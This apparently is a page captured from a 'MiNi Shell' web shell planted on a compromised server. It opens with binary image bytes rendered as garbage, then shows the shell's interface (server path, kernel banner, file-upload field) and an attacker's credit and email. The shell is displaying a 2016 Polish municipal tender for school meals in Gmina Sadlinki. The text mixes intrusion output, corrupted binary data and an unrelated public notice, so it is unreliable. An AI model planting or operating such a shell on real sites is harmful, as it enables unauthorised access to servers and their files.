JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160520/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160520/56407-N-2016.html

<p class="kh_header"><b>Sadlinki: Przygotowanie i dostarczanie posiłków dla uczniów z placówek oświatowych na terenie Gminy Sadlinki</b><br>
<b>Numer ogłoszenia: 56407 - 2016; data zamieszczenia: 20.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sadlinki , ul. Kwidzyńska 12, 82-522 Sadlinki, woj. pomorskie, tel. 055 2757510, faks 055 2757580.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sadlinki.biuletyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie i dostarczanie posiłków dla uczniów z placówek oświatowych na terenie Gminy Sadlinki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 
1.	Świadczenie usług w zakresie przygotowywania, wydawania i dostarczania obiadów dla uczniów Zespołu Szkół w Sadlinkach przy ul. Grudziądzkiej 14 A i w Zespole Szkół w Nebrowie Wielkim przy ul. Szkolnej 6 oraz Szkoły Podstawowej przy ul. Nadwiślańskiej 21. 

2.	Dostarczanie i wydawanie posiłków- śniadanie, obiad i podwieczorek dla dzieci w Przedszkolu Publicznym w Sadlinkach przy ul. Kwidzyńskiej 9 i dzieci uczęszczających do Oddziałów Przedszkolnych przy Szkole Podstawowej w Nebrowie Wielkim przy ul. Nadwiślańskiej 21.  

3. Przygotowanie posiłków odbywać się będzie w obiekcie Zespołu Szkół w Sadlinkach, w którym znajdują się odpowiednio przygotowane do tego celu pomieszczenia, wraz z odpowiednim wyposażeniem.  Posiłki należy dostarczyć do Zespołu Szkół w Nebrowie Wielkim, Przedszkola Publicznego w Sadlinkach i Oddziałów Przedszkolnych przy Szkole Podstawowej w Nebrowie Wielkim. Wyposażenie pomieszczeń stanowi Załącznik nr 1 do niniejszej Umowy. 

4. Posiłki wydawane będą w Zespole Szkół w Sadlinkach oraz dostarczane i wydawane w: Zespole Szkół w Nebrowie Wielkim, Przedszkolu Publicznym w Sadlinkach i Oddziałach Przedszkolnych przy Szkole Podstawowej w Nebrowie Wielkim zgodnie z poniższym wykazem (Tabela1). Zamawiający udostępni nieodpłatnie pomieszczenia do wydawania oraz spożywania posiłków we wszystkich placówkach.

Tabela 1

Nazwa placówki	Wydawanie posiłków
Zespół Szkół w Sadlinkach	po stronie Wykonawcy
Zespół Szkół w Nebrowie Wielkim	po stronie Wykonawcy
Przedszkole Publiczne w Sadlinkach	po stronie Wykonawcy
Oddziały Przedszkolne w Nebrowie Wielkim	po stronie Wykonawcy

5. Wykonawca zobowiązany będzie do sprzątania po posiłkach w pomieszczeniach kuchni i stołówki, zgodnie z poniższym wykazem (Tabela 2).

Tabela 2
Nazwa szkoły	Sprzątanie po posiłkach	Środki czystości
Zespół Szkół w Sadlinkach	po stronie Wykonawcy	po stronie Wykonawcy
Zespół Szkół w Nebrowie Wielkim	po stronie Wykonawcy	po stronie Wykonawcy
Przedszkole Publiczne w Sadlinkach	po stronie Wykonawcy	po stronie Wykonawcy
Oddziały Przedszkolne w Nebrowie Wielkim	po stronie Wykonawcy	po stronie Wykonawcy
		

6. Wykonawca zobowiązany jest do zapewnienia usług objętych przedmiotem zamówienia,  w  dniach nauki uczniów i innych dniach pobytu uczniów w szkołach oraz we wszystkie dni pracy przedszkola i oddziałów przedszkolnych w okresie od 01.08.2016 r. do 31.08.2019 r. z uwzględnieniem dni wolnych.

7. Zamawiający zobowiązuje również wykonawcę do świadczenia usług żywieniowych w dniach wolnych od nauki np. okres ferii zimowych, okres wakacji, jeżeli będzie to wynikać z potrzeb szkoły, ze względu na pobyt uczestników w organizowanych przez placówkę obozów, kolonii i innych zgrupowań.

8. Termin realizacji przedmiotu zamówienia obejmuje okres od 1 sierpnia 2016 r. do 31 sierpnia 2019 r. szacunkowo 551 dni  tj. w 2016 r.- 80, 2017 r.- 184 , 2018 r.- 185  i 2019 r.- 102 
dla Zespołu Szkół w Sadlinkach i w Nebrowie Wielkim oraz szacunkowo 716 dni tj. w 2016 r.- 106, 2017 r.- 230 , 2018 r.- 232 i 2019 r.- 148 dla Przedszkola Publicznego w Sadlinkach i Oddziałów Przedszkolnych przy Szkole Podstawowej w Nebrowie Wielkim.

9. Przedmiot zamówienia obejmuje dożywianie uczniów ze środków Gminnego Ośrodka Pomocy Społecznej w Sadlinkach w ramach wieloletniego programu wspierania finansowego gmin w zakresie dożywiania  Pomoc państwa w zakresie dożywiania

10. Szacunkowa dzienna liczba posiłków wynosi 303. 
Zespół Szkół w Sadlinkach- ok.98                                     w tym 44 GOPS, 
Zespół Szkół w Nebrowie Wielkim- ok. 41                       w tym 36 GOPS, 
Przedszkole Publiczne w Sadlinkach- ok. 114                   w tym 14 GOPS, 
Oddziały Przedszkolne w Nebrowie Wielkim - ok. 50      w tym 4 GOPS, 

11. Liczba posiłków może ulegać zmianie, co oznacza, że nie stanowi ostatecznego wymiaru zamówienia i nie może być podstawą do zgłaszania roszczeń z tytułu niezrealizowanych posiłków lub podstawą wykonania zamówienia. Wykonawcy będzie przysługiwało wynagrodzenie za faktycznie przygotowane i wydane posiłki.

12. Dostarczanie i wydawanie posiłków do placówek odbywać się będzie w godzinach ustalonych z dyrektorami szkół.

13. Wykonawca pokryje wszelkie koszty związane z przygotowaniem, dostarczeniem, porcjowaniem i wydaniem posiłków, w szczególności koszty zakupu artykułów spożywczych, koszty obsługi i przygotowywania posiłków, koszty uzyskania stosownych zezwoleń, koszty utrzymania personelu, itp.

14. Wykonawca pokryje wszelkie koszty eksploatacyjne związane z utrzymaniem kuchni i stołówki w Zespole Szkół w Sadlinkach, a w szczególności:
1 	koszty remontów bieżących pomieszczeń malowanie kuchni, zaplecza kuchennego i stołówki zgodnie z wymaganiami sanitarno - higienicznymi,
2	koszty napraw bieżących i konserwacji powierzonych urządzeń, sprzętu oraz wyposażenia kuchni i stołówki,
3	 koszty zużycia energii elektrycznej, wody i odprowadzania ścieków, oraz wywozu nieczystości 

15. Korzystanie z pomieszczeń kuchni i wyposażenia nie jest obligatoryjne. W przypadku, gdy Wykonawca nie będzie korzystał z pomieszczeń kuchni  w szkole w Sadlinkach nie będą miały zastosowania postanowienia  § 4 umowy załącznik nr 5 do SIWZ.

16. Wykonawca korzystający z pomieszczeń w Zespole Szkół w Sadlinkach zobowiązany jest do zapewnienia w nich odpowiedniego stanu technicznego i sanitarno - epidemiologicznego, odpowiedniego wyposażenia oraz właściwych warunków bhp. i p.poż, stosownie do wymogów Sanepidu, PIP i innych instytucji mających uprawnienia kontrolne, przyjmując na siebie wszelkie zobowiązania, w szczególności przed rozpoczęciem działalności uzyskania pozytywnej decyzji zezwalającej na realizację przedmiotu zamówienia od właściwego inspektora sanitarnego.

16. Wykonawca za korzystanie z pomieszczeń i sprzętu niezbędnego do przygotowania i wydania posiłków nie będzie ponosił kosztów.

WYMAGANIA DOTYCZĄCE POSIŁKÓW

1. Wykonawca będzie przygotowywał posiłki zgodnie z zasadami określonymi w ustawie z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia  Dz. U. z 2015 r.  poz. 594 z późn. zm. łącznie z przepisami wykonawczymi do tej ustawy.

2. Posiłki, pod względem technologii wykonania i jakości, spełniać muszą normy określone przez Instytut Żywności i Żywienia Dzieci i Młodzieży, w szczególności posiłki muszą posiadać wymaganą przepisami kaloryczność i muszą być sporządzone zgodnie z wymogami sztuki kulinarnej i sanitarnej dla żywienia zbiorowego. Wykonawca zobowiązany jest do przygotowania i dostarczenia posiłków o najwyższym standardzie, na bazie produktów najwyższej jakości i bezpieczeństwa zgodnie z normami HACCP.

3.Wykonawca zobowiązany będzie do dostarczenia posiłków własnym transportem przystosowanym do przewozu żywności, na własny koszt w specjalistycznych termosach, gwarantujących utrzymanie odpowiedniej temperatury oraz jakości przewożonych potraw, do pomieszczeń kuchni w poszczególnych placówkach, ich porcjowania i wydania, a także odbioru termosów po posiłkach oraz odbioru odpadów/nieczystości/resztek po posiłkach.
4. Wykonawca będzie przygotowywał posiłki zachowując wymogi sanitarno- epidemiologiczne w zakresie personelu i warunków produkcji oraz weźmie odpowiedzialność za ich przestrzeganie.

5. Wykonawca w ramach świadczonych usług zobowiązany jest do współpracy z dyrektorami szkół i kierownikiem Gminnego Ośrodka Pomocy Społecznej. Tygodniowy jadłospis będzie przedstawiany dyrektorom szkół z dwudniowym wyprzedzeniem.

6.Wykonawca ponosi pełną odpowiedzialność cywilną i finansową za jakość dostarczanych posiłków oraz skutki wynikające z zaniedbań przy ich przygotowaniu i transporcie, mogące mieć negatywny wpływ na zdrowie żywionych dzieci.

7.Zakłada się , że w szkołach wykonawca przygotowuje  Pełny posiłek  trzy razy w tygodniu, natomiast  Drugie danie, dwa razy w tygodniu 

Wykonawca zobowiązany będzie do przygotowania posiłków według następującego rodzaju Tabela 3

Tabela 3
Rodzaj posiłku	Opis
Drugie danie 	Obiad typu drugie danie + kompot sok: ziemniaki makaron ryż kasza oraz mięso ryba i surówka gotowane warzywa + kompot woda z sokiem. 
Pełny posiłek 	Obiad typu pełny posiłek: zupa + drugie danie jw. + kompot sok
Drugie danie mogą stanowić: pierogi, naleśniki, krokiety, kopytka, makaron z sosem warzywno - mięsnym owocowym
	
Śniadanie	Śniadanie  kanapka z wędliną, kanapka z serem białym, jajko, kanapka z serem żółtym, płatki na mleku, jajecznica, parówka, bułka paryska, kanapka z wędliną itp. wraz z napojem mleko, kakao, herbata itp.
Podwieczorek	jogurt, serek, owoc wraz z ciasteczkiem itp.

8. Waga posiłków powinna wynosić:
2	zupa - 300 ml,  
3	ziemniaki makaron ryż kasza - 200 g,
4	mięso ryba - 100 g,  
5	surówka gotowane warzywa - 100 g,
6	pierogi, naleśniki, krokiety, kopytka, makaron z sosem warzywno - mięsnym owocowym - 200 g.
 9.  Zamawiający nie dopuszcza, ażeby w ciągu 10 dni wystąpiła powtarzalność tego samego  posiłku. Zamawiający zastrzega, że 3 razy w tygodniu winno być danie mięsne rybne.
10. Zamawiający zastrzega, aby minimum raz w ciągu 10 dni na drugie danie było danie rybne. 
11. Do posiłków mają być podawane naprzemiennie w danym tygodniu surówki i jarzyny gotowane. W tym samym tygodniu rodzaj surówki lub jarzyn nie może się powtórzyć. Do posiłków co najmniej dwa razy w tygodniu mają być podawane ziemniaki, w pozostałych dniach może być kasza, ryż itp. obowiązek ten nie dotyczy dni, w których podawane będą dania typu naleśniki, kopytka, itp.
12. Zamawiający zastrzega sobie prawo do dokonywania badań sprawdzających jakość przygotowywanych posiłków, pod względem kaloryczności, gramatury, temperatury, itp.
13.  Posiłki przygotowywane i dostarczane do Przedszkola Publicznego w Sadlinkach oraz  Oddziałów Przedszkolnych przy Szkole Podstawowej w Nebrowie Wielkim mają odpowiadać wymogom dietetycznym właściwym dla dzieci w wieku od 3 do 6 lat.
Przedmiot zamówienia obejmuje dostawy porcji dziennych składających się z trzech posiłków, tj. śniadania, obiadu oraz podwieczorku. Posiłki dostarczane będą 2 razy dziennie w godzinach ustalonych z dyrektorem szkoły i przedszkola.     

14. Podstawą objęcia dziecka posiłkami finansowanymi przez Gminny Ośrodek Pomocy Społecznej w Sadlinkach jest decyzja administracyjna. Wykaz dzieci, którym zostało udzielone wsparcie w formie obiadów, przekazywany będzie wykonawcy i dyrektorom poszczególnych placówek. Liczba dzieci korzystających z obiadów finansowanych przez GOPS jest zmienna. Płatności za obiady finansowane przez Gminny Ośrodek Pomocy Społecznej w Sadlinkach następować będą każdorazowo po zakończeniu świadczenia usługi w danym miesiącu kalendarzowym, przelewem po przedłożeniu faktury VAT..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.52.31.00-3, 55.52.40.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2019.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnieniu warunków udziału w postępowani</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnieniu warunków udziału w postępowani</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnieniu warunków udziału w postępowani</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnieniu warunków udziału w postępowani</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sadlinki.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Sadlinki
ul. Kwidzyńska 12
82-522 Sadlinki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2016 godzina 08:00, miejsce: Urząd Gminy Sadlinki
ul. Kwidzyńska 12
82-522 Sadlinki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com